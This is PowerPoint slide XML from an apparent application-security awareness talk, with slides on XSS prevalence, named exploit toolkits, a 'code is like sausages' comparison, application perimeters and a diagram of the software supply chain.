              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0"/>
              <a:t>first self propagating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" dirty="0" smtClean="0"/>
              <a:t> worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Wide scale problem, 13 years later!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Toolkits: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>Mpack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>LuckySploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>, ISR-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>Evilgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t> etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Attacking the client: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>Phisihing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>, Malware Upload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Ironically easy to fix and detect but 60%-70% of sites are vulnerable..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pP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What’s in your code?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Application Code is like sausages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1612900" y="2311400"/>
          <a:ext cx="6096000" cy="20269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IE" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Sausage</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Code</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
                        <a:t>“Taste nice” </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
                        <a:t>Apps Look Nice </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
                        <a:t>Filling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
                        <a:t>Fulfil requirement</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
                        <a:t>We don’t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> want to know what's in them, or how they are made!!!!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
                        <a:t>Same with</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> code!!!!!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IE" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="sausage.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="342900"/>
            <a:ext cx="2578100" cy="1757795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825500" y="5397500"/>
            <a:ext cx="7543800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Currently software QA (Unit, System, Integration, UAT)  tests what software can do, not what we can make it do!!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE"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268288"/>
            <a:ext cx="8235950" cy="852487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Where is your Application Perimeter?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Border Router?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>WAF/Firewall?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Public facing – Authentication Page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Software food chain?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Lets look at this for a sec:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Where does your code come from? Who wrote it? How do I know its secure / developed in a secure manner?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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 y="230188"/>
            <a:ext cx="6553200" cy="852487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Software food chain</a:t>
            </a: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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393700" y="2324100"/>
            <a:ext cx="914400" cy="914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100" dirty="0" smtClean="0"/>
              <a:t>Application Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1955800" y="1752600"/>
            <a:ext cx="1612900" cy="1066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00" dirty="0" smtClean="0"/>
              <a:t>COTS (Commercial off the shelf</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="6" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3332496" y="787399"/>
            <a:ext cx="1925304" cy="112142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 name="Oval 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="355600"/>
            <a:ext cx="1435100" cy="8636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100" dirty="0" smtClean="0"/>
              <a:t>Outsourced  development</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Octagon 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="431800"/>
            <a:ext cx="1219200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="octagon">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50" dirty="0" smtClean="0"/>
              <a:t>Sub-Contractors</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="5"/>
            <a:endCxn id="9" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6692900" y="744254"/>
            <a:ext cx="1079500" cy="4314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6" name="Oval 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2070100" y="2946400"/>
            <a:ext cx="1612900" cy="1066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00" dirty="0" smtClean="0"/>
              <a:t>Bespoke outsourced development</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1308100" y="2286000"/>
            <a:ext cx="647700" cy="4953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Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1308100" y="2781300"/>
            <a:ext cx="762000" cy="6985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Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="4"/>
            <a:endCxn id="16" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3683000" y="1186144"/>
            <a:ext cx="4089400" cy="2293655"/>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
        <p:nvSpPr>
          <p:cNvPr id="27" name="Oval 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1778000" y="4267200"/>
            <a:ext cx="1612900" cy="1066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00" dirty="0" smtClean="0"/>
              <a:t>Bespoke Internal development</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Shape 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="4"/>
            <a:endCxn id="27" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2892425" y="1717675"/>
            <a:ext cx="3581400" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Octagon 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5346700" y="2019300"/>
            <a:ext cx="1219200" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="octagon">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50" dirty="0" smtClean="0"/>
              <a:t>Third Party API’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Shape 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="6"/>
            <a:endCxn id="6" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="4480578" y="1107422"/>
            <a:ext cx="266700" cy="2090455"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85714"/>
              <a:gd name="adj2" fmla="val 57473"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Shape 34"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="4"/>
            <a:endCxn id="16" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3446796" y="2773645"/>
            <a:ext cx="1899904" cy="1083326"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43784"/>
              <a:gd name="adj2" fmla="val 135523"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Curved Connector 36"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="27" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3738262" y="2502535"/>
            <a:ext cx="1337329" cy="2504459"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Curved Connector 38"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="7"/>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6908800" y="843245"/>
            <a:ext cx="520700" cy="1831410"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="Curved Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="6"/>
            <a:endCxn id="9" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5607659" y="1144226"/>
            <a:ext cx="926571" cy="823579"/>
          </a:xfrm>
          <a:prstGeom prst="curved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
        <p:nvSpPr>
          <p:cNvPr id="43" name="Octagon 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5359400" y="3606800"/>
            <a:ext cx="1320800" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="octagon">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1050" dirty="0" smtClean="0"/>
              <a:t>Third Party Components &amp; Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Shape 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="4"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="850900" y="3238501"/>
            <a:ext cx="4508500" cy="1176527"/>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47" name="Shape 46"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6458187" y="1720614"/>
            <a:ext cx="2442973" cy="1998945"/>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49" name="Shape 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7205946" y="858555"/>
            <a:ext cx="833155" cy="2113245"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Freeform 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1130300"/>
            <a:ext cx="897467" cy="3797300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 50800 w 897467"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3797300"/>
              <a:gd name="connsiteX1" fmla="*/ 889000 w 897467"/>
              <a:gd name="connsiteY1" fmla="*/ 1676400 h 3797300"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 897467"/>
              <a:gd name="connsiteY2" fmla="*/ 3797300 h 3797300"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="897467" h="3797300">
                <a:moveTo>
                  <a:pt x="50800" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="474133" y="521758"/>
                  <a:pt x="897467" y="1043517"/>
                  <a:pt x="889000" y="1676400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="880533" y="2309283"/>
                  <a:pt x="440266" y="3053291"/>
                  <a:pt x="0" y="3797300"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:prstDash val="dash"/>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IE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Freeform 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="1066800"/>
            <a:ext cx="1104900" cy="3898900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1104900"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3898900"/>
              <a:gd name="connsiteX1" fmla="*/ 1104900 w 1104900"/>
              <a:gd name="connsiteY1" fmla="*/ 1917700 h 3898900"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1104900"/>
              <a:gd name="connsiteY2" fmla="*/ 3898900 h 3898900"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1104900" h="3898900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="552450" y="633941"/>
                  <a:pt x="1104900" y="1267883"/>
                  <a:pt x="1104900" y="1917700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1104900" y="2567517"/>
                  <a:pt x="552450" y="3233208"/>
                  <a:pt x="0" y="3898900"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:prstDash val="dash"/>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IE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Freeform 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6743700" y="266700"/>
            <a:ext cx="1756833" cy="4775200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 25400 w 1756833"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4775200"/>
              <a:gd name="connsiteX1" fmla="*/ 1752600 w 1756833"/>
              <a:gd name="connsiteY1" fmla="*/ 2781300 h 4775200"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1756833"/>
              <a:gd name="connsiteY2" fmla="*/ 4775200 h 4775200"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1756833" h="4775200">
                <a:moveTo>
                  <a:pt x="25400" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="891116" y="992716"/>
                  <a:pt x="1756833" y="1985433"/>
                  <a:pt x="1752600" y="2781300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1748367" y="3577167"/>
                  <a:pt x="874183" y="4176183"/>
                  <a:pt x="0" y="4775200"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:prstDash val="dash"/>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IE"/>
          </a:p>
        </p:txBody>
      </p:sp>
